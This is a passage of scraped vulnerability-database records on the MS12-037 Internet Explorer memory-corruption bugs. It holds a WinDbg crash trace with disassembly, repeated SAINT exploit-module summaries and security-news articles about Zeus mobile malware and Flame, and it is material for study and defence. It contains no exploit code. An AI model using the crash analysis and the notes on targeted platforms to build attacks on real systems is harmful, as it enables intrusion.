2023\n \n\nDigging into the crash\n \n \n 0:008> kb\n ChildEBP RetAddr Args to Child\n 020bba84 63660eed 80020003 00176778 020bbaa4 mshtml!CElement::Doc+0x2\n 020bba94 63660f5a 00000000 00000348 020bbaf8 mshtml!CElement::GetAtomTable+0x10\n 020bbaa4 635b6bb7 033b49ac 00000003 00176701 mshtml!CCollectionCache::GetAtomFromName+0x15\n 020bbaf8 635e7b76 0023f4d8 033b49ac 00000003 mshtml!CCollectionCache::GetIntoAry+0x74\n 020bbb3c 635e7c20 0000000e 033b49ac 020bbc28 mshtml!CCollectionCache::GetDispID+0x13e\n 020bbb50 635d36b0 0023f4d8 0000000e 033b49ac mshtml!DispatchGetDispIDCollection+0x3f\n 020bbb78 63643d3e 03137230 033b49ac 10000003 mshtml!CElementCollectionBase::VersionedGetDispID+0x46\n 020bbbb8 633a9eb2 03137260 033b49ac 10000003 mshtml!PlainGetDispID+0xdc\n 020bbbe8 633a9e13 033b49ac 020bbc28 03137260 jscript!IDispatchExGetDispID+0xb7\n 020bbc04 633a9f17 008da788 020bbc28 00000003 jscript!GetDex2DispID+0x34\n 020bbc30 633a77ff 008da788 020bbc64 0000000c jscript!VAR::InvokeByName+0xeb\n 020bbc78 633a75bf 008da788 0000000c 00000000 jscript!VAR::InvokeDispName+0x7a\n 020bbe0c 633a5ab0 020bbe24 020bbf6c 020bbf6c jscript!CScriptRuntime::Run+0x1f27\n 020bbef4 633a59f7 020bbf6c 00000000 008de830 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020bbf40 633a5743 020bbf6c 00000000 008de830 jscript!ScrFncObj::Call+0x8f\n 020bbfbc 633a8bc7 008dc830 020be3b8 00000000 jscript!CSession::Execute+0x175\n 020bc0a4 633a8a35 008dc830 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8\n 020bc128 633a6d37 008dc830 00000000 00000001 jscript!NameTbl::InvokeEx+0x129\n 020bc168 633a6c75 008da788 00000000 00000001 jscript!IDispatchExInvokeEx2+0xf8\n 020bc1a4 63399186 008da788 00000001 00000001 jscript!IDispatchExInvokeEx+0x6a\n 020bc234 635fe083 020bc1f8 00000004 00000001 jscript!NameTbl::InvokeEx+0x372\n 020bc26c 635fdfab 02dc8a18 00000001 00000001 mshtml!CScriptCollection::InvokeEx+0x8a\n 020be2e0 63642f30 02d1e060 00002712 00000001 mshtml!CWindow::InvokeEx+0x6a9\n 020be308 63642eec 02d1e060 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20\n 020be358 63643898 031371a0 00002712 00000001 mshtml!PlainInvokeEx+0xea\n 020be3c8 636435c4 02d17200 00002712 00000001 mshtml!COmWindowProxy::InvokeEx+0x338\n 020be3f0 63642f30 02d17200 00002712 00000001 mshtml!COmWindowProxy::subInvokeEx+0x26\n 020be418 63642eec 02d17200 00002712 00000001 mshtml!CBase::VersionedInvokeEx+0x20\n 020be468 633a6d37 0020d2e0 00002712 00000001 mshtml!PlainInvokeEx+0xea\n 020be4a8 633a6c75 008da788 00002712 00000409 jscript!IDispatchExInvokeEx2+0xf8\n 020be4e4 633a9cfe 008da788 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a\n 020be5a4 633a9d79 00002712 00000001 00000000 jscript!InvokeDispatchEx+0x98\n 020be5d0 633a9c0b 008da788 00000000 00000001 jscript!VAR::InvokeByDispID+0x154\n 020be76c 633a5ab0 020be784 020be8cc 020be8cc jscript!CScriptRuntime::Run+0x2989\n 020be854 633a59f7 020be8cc 00000000 008de8d0 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020be8a0 633a5743 020be8cc 00000000 008de8d0 jscript!ScrFncObj::Call+0x8f\n 020be91c 633a8bc7 033a6348 020beb60 00000000 jscript!CSession::Execute+0x175\n 020bea04 633a8a35 033a6348 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8\n 020bea88 635c3039 033a6348 00000000 00000409 jscript!NameTbl::InvokeEx+0x129\n 020bead8 635c2f51 03182d38 033a6348 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e0\n 020bec04 636294ce 80010009 80011771 03137710 mshtml!CBase::InvokeEvent+0x213\n 020bed64 635f377c 03182d38 02d03060 03182d38 mshtml!CBase::FireEvent+0xe2\n 020beddc 6362b142 03182d38 02dc8f40 ffffffff mshtml!CElement::BubbleEventHelper+0x2e3\n 020bef40 63783dd6 63649344 00000000 02dc8f40 mshtml!CElement::FireEvent+0x2d1\n 020bf080 638e6827 03182d38 033b4b88 020bf0b8 mshtml!CElement::fireEvent+0x185\n 020bf0c8 636430c9 03182d38 008d8f80 031371d0 mshtml!Method_VARIANTBOOLp_BSTR_o0oVARIANTp+0xfb\n 020bf13c 6366418a 03182d38 80010452 00000001 mshtml!CBase::ContextInvokeEx+0x5d1\n 020bf18c 6362b6ce 03182d38 80010452 00000001 mshtml!CElement::ContextInvokeEx+0x9d\n 020bf1b8 63642eec 03182d38 80010452 00000001 mshtml!CElement::VersionedInvokeEx+0x2d\n 020bf208 633a6d37 03137620 80010452 00000001 mshtml!PlainInvokeEx+0xea\n 020bf248 633a6c75 008da788 80010452 00000409 jscript!IDispatchExInvokeEx2+0xf8\n 020bf284 633a9cfe 008da788 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a\n 020bf344 633a9f3c 80010452 00000001 00000000 jscript!InvokeDispatchEx+0x98\n 020bf378 633a77ff 008da788 020bf3ac 00000001 jscript!VAR::InvokeByName+0x135\n 020bf3c4 633a85c7 008da788 00000001 00000000 jscript!VAR::InvokeDispName+0x7a\n 020bf3f4 633a9c0b 008da788 00000000 00000001 jscript!VAR::InvokeByDispID+0xce\n 020bf590 633a5ab0 020bf5a8 00000000 00000000 jscript!CScriptRuntime::Run+0x2989\n 020bf678 633a59f7 00000000 00000000 008de980 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020bf6c4 633a92f7 00000000 00000000 008de980 jscript!ScrFncObj::Call+0x8f\n 020bf748 633a6650 008defa8 008da788 00000001 jscript!NameTbl::InvokeInternal+0x137\n 020bf778 633a9c0b 008da788 00000000 00000001 jscript!VAR::InvokeByDispID+0x17c\n 020bf914 633a5ab0 020bf92c 020bfa74 020bfa74 jscript!CScriptRuntime::Run+0x2989\n 020bf9fc 633a59f7 020bfa74 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n 020bfa48 633a5743 020bfa74 00000000 00000000 jscript!ScrFncObj::Call+0x8f\n 020bfac4 633a8bc7 008dedc0 020bfcd4 00000000 jscript!CSession::Execute+0x175\n 020bfbac 633a8a35 008dedc0 00000000 00000001 jscript!NameTbl::InvokeDef+0x1b8\n 020bfc30 633a9153 008dedc0 00000000 00000000 jscript!NameTbl::InvokeEx+0x129\n 020bfc58 636867fa 008dedc0 00000000 63633600 jscript!NameTbl::Invoke+0x70\n 020bfcec 6368675a 02d1e060 02decc60 00239040 mshtml!CWindow::ExecuteTimeoutScript+0x87\n 020bfd44 6368664a 02d1e060 02d1e0a2 020bfd78 mshtml!CWindow::FireTimeOut+0xb6\n 020bfd54 63686656 0000202b 020bfde0 6363c317 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0xb6\n 020bfd78 7e418734 001005d8 00000011 0000202b mshtml!GlobalWndProc+0x183\n 020bfda4 7e418816 6363c317 001005d8 00000113 USER32!InternalCallWinProc+0x28\n 020bfe0c 7e4189cd 00000000 6363c317 001005d8 USER32!UserCallWinProcCheckWow+0x150\n 020bfe6c 7e418a10 020bfe94 00000000 020bfeec USER32!DispatchMessageWorker+0x306\n 020bfe7c 01252ec9 020bfe94 00000000 008d5d00 USER32!DispatchMessageW+0xf\n 020bfeec 011f48bf 001703f8 00000001 00150390 IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\n 020bffa4 5de05a60 008d5d00 0fbc002f 020bffec IEFRAME!LCIETab_ThreadProc+0x2c1\n 020bffb4 7c80b713 00150390 00000001 0fbc002f iertutil!CIsoScope::RegisterThread+0xab\n 020bffec 00000000 5de05a52 00150390 00000000 kernel32!BaseThreadStart+0x37\n \n\nCrashing here in IE8 XP SP3\n \n \n .text:6363FCC4 ; public: class CDoc * __thiscall CElement::Doc(void)const\n .text:6363FCC4 mov eax, [ecx]\n .text:6363FCC6 mov edx, [eax+70h]\n .text:6363FCC9 call edx\n .text:6363FCCB mov eax, [eax+0Ch]\n .text:6363FCCE retn\n \n\n# References\n\n<http://www.osvdb.org/show/osvdb/82865>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "attackerkb", "title": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2020-02-13T00:00:00", "id": "AKB:86F6B513-5CD4-4249-98FD-F14E9B841B85", "href": "https://attackerkb.com/topics/WyiMG5q7hi/ms12-037-microsoft-internet-explorer-same-id-property-deleted-object-handling-memory-corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:57", "description": "Added: 06/22/2012 \nCVE: [CVE-2012-1875](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>) \nBID: [53847](<http://www.securityfocus.com/bid/53847>) \nOSVDB: [82865](<http://www.osvdb.org/82865>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nA vulnerability in Internet Explorer allows command execution when a user opens a specially crafted web page which causes an access attempt to a deleted object, resulting in memory corruption. \n\n### Resolution\n\nApply the update found in [Microsoft Security Bulletin 12-037](<http://technet.microsoft.com/en-us/security/bulletin/MS12-037>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS12-037> \n\n\n### Limitations\n\nExploit works on Internet Explorer 8 on Windows XP and Windows 7, and requires a user to open the exploit page. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "saint", "title": "Internet Explorer Same ID Property vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-22T00:00:00", "id": "SAINT:5F2CD1CEF103DC892FE640C5B9AB2538", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_same_id_property", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:19", "description": "Added: 06/22/2012 \nCVE: [CVE-2012-1875](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>) \nBID: [53847](<http://www.securityfocus.com/bid/53847>) \nOSVDB: [82865](<http://www.osvdb.org/82865>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nA vulnerability in Internet Explorer allows command execution when a user opens a specially crafted web page which causes an access attempt to a deleted object, resulting in memory corruption. \n\n### Resolution\n\nApply the update found in [Microsoft Security Bulletin 12-037](<http://technet.microsoft.com/en-us/security/bulletin/MS12-037>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS12-037> \n\n\n### Limitations\n\nExploit works on Internet Explorer 8 on Windows XP and Windows 7, and requires a user to open the exploit page. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "saint", "title": "Internet Explorer Same ID Property vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-22T00:00:00", "id": "SAINT:A18B5414CB2FF175AAF8AFC982E85952", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_same_id_property", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T15:21:01", "description": "Added: 06/22/2012 \nCVE: [CVE-2012-1875](<https://vulners.com/cve/CVE-2012-1875>) \nBID: [53847](<http://www.securityfocus.com/bid/53847>) \nOSVDB: [82865](<http://www.osvdb.org/82865>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nA vulnerability in Internet Explorer allows command execution when a user opens a specially crafted web page which causes an access attempt to a deleted object, resulting in memory corruption. \n\n### Resolution\n\nApply the update found in [Microsoft Security Bulletin 12-037](<http://technet.microsoft.com/en-us/security/bulletin/MS12-037>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS12-037> \n\n\n### Limitations\n\nExploit works on Internet Explorer 8 on Windows XP and Windows 7, and requires a user to open the exploit page. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "saint", "title": "Internet Explorer Same ID Property vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-22T00:00:00", "id": "SAINT:1D36EAAA583304555F072139C691DB73", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_same_id_property", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:19:42", "description": "Added: 06/22/2012 \nCVE: [CVE-2012-1875](<https://vulners.com/cve/CVE-2012-1875>) \nBID: [53847](<http://www.securityfocus.com/bid/53847>) \nOSVDB: [82865](<http://www.osvdb.org/82865>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nA vulnerability in Internet Explorer allows command execution when a user opens a specially crafted web page which causes an access attempt to a deleted object, resulting in memory corruption. \n\n### Resolution\n\nApply the update found in [Microsoft Security Bulletin 12-037](<http://technet.microsoft.com/en-us/security/bulletin/MS12-037>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS12-037> \n\n\n### Limitations\n\nExploit works on Internet Explorer 8 on Windows XP and Windows 7, and requires a user to open the exploit page. \n\nJRE 6 must be installed on Windows 7 targets. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-06-22T00:00:00", "type": "saint", "title": "Internet Explorer Same ID Property vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-22T00:00:00", "id": "SAINT:5D523D730147A4DFF17FF24DE76DC1B6", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ie_same_id_property", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-06T00:00:00", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2012-08-06T00:00:00", "id": "SAINT:26F60ECC90154B838B0AF4C895DDCD0E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:27", "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-06T00:00:00", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2012-08-06T00:00:00", "id": "SAINT:625E0D0980997F6BFF377B9847205303", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T15:21:01", "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<https://vulners.com/cve/CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-06T00:00:00", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2012-08-06T00:00:00", "id": "SAINT:E0DB2F32D06502F92B8144DCC51213D4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:19:42", "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<https://vulners.com/cve/CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-06T00:00:00", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2012-08-06T00:00:00", "id": "SAINT:0D86A59930F55482420F7E5F732B1327", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:02:48", "description": "There\u2019s a new series of malicious Android applications masquerading as a premium security app for the mobile platform, and researchers say that the malware is part of the Zeus empire. \n\nThe fake security apps began showing up in researchers\u2019 malware traps in early June and newer versions have continued to pop up throughout the month. The file is called \u201cAndroid Security Suite Premium \u201d and its main intent seems to be stealing incoming SMS messages and then sending them off to one of the attacker\u2019s command-and-control servers. Depending upon what apps the victim\u2019s phone has installed, those incoming messages could contain sensitive data such as password-reset links or other information.\n\nOnce the malicious app is installed and executed, it will show the user a fake activiation code.\n\n\u201cIt is also important to mention that these malicious apps are able to receive commands for uninstalling themselves, stealing system information and enabling/disabling the malicious applications. Let\u2019s be honest, such functionality (the ability to receive and execute commands and the ability to steal SMS messages) is not that new for mobile (Android) malware. But there was a feeling that there was something more behind these files,\u201d [Denis Maslennikov](<http://www.securelist.com/en/blog/208193604/Android_Security_Suite_Premium_New_ZitMo>), a Kaspersky Lab security researcher, said in an analysis of the Android security threat.\n\nThe malware uses a series of six C&C servers, some of which are essentially blank slates in terms of available information. But one of them provided the link that showed researchers that the scam is part of the larger Zeus malware campaign. That server is registered in Russia, but with mostly fake data. However, some of that data led researchers to other files that they knew were Zeus-related.\n\n\u201cYes, it\u2019s fake data but if you continue to google for e.g. _simonich@inbox.ru_ you will find out that there are more domains which were registered back in 2011 using the same fake data. For example, favoritopi*****.com, akteriak*****.com, basepol*****.com or justdongwf3*****.info. **All these domains were found in our ZeuS C&C database,\u201d **Maslennikov wrote.\n\nMobile versions of Zeus, also called ZitMo, or Zeus in the Mobile, have been around for a couple of years now, and attackers have been successful in disguising the malware in various ways. The new version for Android shows that the Zeus attackers are not slowing down in their efforts to continue to get their malware on users\u2019 devices.\n", "cvss3": {}, "published": "2012-06-18T15:28:08", "type": "threatpost", "title": "New Fake Android Security App is Zeus Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2013-04-17T16:32:00", "id": "THREATPOST:74747632648B74F1D877E378B47EC825", "href": "https://threatpost.com/new-fake-android-security-app-zeus-malware-061812/76703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:48", "description": "When the news about the [Flame malware](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) first broke several weeks ago, people from all parts of the security community, political world and elsewhere quickly began trying to figure out what the significance of the tool was and whether it represented anything new. That was difficult at the time, given the lack of data on its exact capabilities and parentage. But, with the information available to us now, it seems safe to say that Flame has changed the way that many people think about the threat landscape and the way attackers work, not just in the security community but in the political arena, as well.\n\nWhat and how you think about Flame and its younger sibling Stuxnet depends largely on your position in security or political community as well as your history with these kinds of attack tools in the past. By that I don\u2019t mean whether you\u2019ve been hit by [Stuxnet](<https://threatpost.com/stuxnet-authors-made-several-basic-errors-011811/>) or [Duqu](<https://threatpost.com/anatomy-duqu-attacks-112111/>), but rather how you experienced the drama, hype and reality surrounding those attacks. For some people, the emergence of Stuxnet was the first time they saw hard evidence of a professional attack team with nation-level resources going after high-value targets. The target in that case was the Iranian Natanz nuclear facility, which immediately raised speculation that either Israel or the United States was behind the attack.\n\nThe same was true of the sandstorm surrounding the discovery of Duqu last year. Duqu had a larger and more diffuse target list, and it wasn\u2019t immediately obvious what it\u2019s purpose was or who its creators might be. But as the research progressed, experts eventually came to the conclusion that [Stuxnet and Duqu were created by the same team](<https://threatpost.com/researchers-convinced-duqu-written-same-group-stuxnet-111611/>). That added an extra layer of intrigue to the whole situation, providing more evidence that there was a seriously skilled attack team at work somewhere, possibly inside the U.S.\n\nFor some people, this made perfect sense. Of course the U.S. and/or Israel is attacking Iran and Syria and other countries with these kinds of weapons. As an addition to traditional intelligence tactics, an attack like Stuxnet would be a natural. It\u2019s virtually impossible to attribute to anyone definitively and it\u2019s very low risk for the attacker. No people are in harm\u2019s way and the politicians and diplomats have the safety of deniability.\n\nFor others, Stuxnet and Duqu were simply two more pieces of malware, albeit ones that happened to show up inside some interesting networks. For the people in this category, cyberwar and the idea of governments attacking each other with sophisticated tools built by teams of expert hackers were pure fiction, the stuff of B movies. This position became largely untenable with the revelation that Stuxnet used several 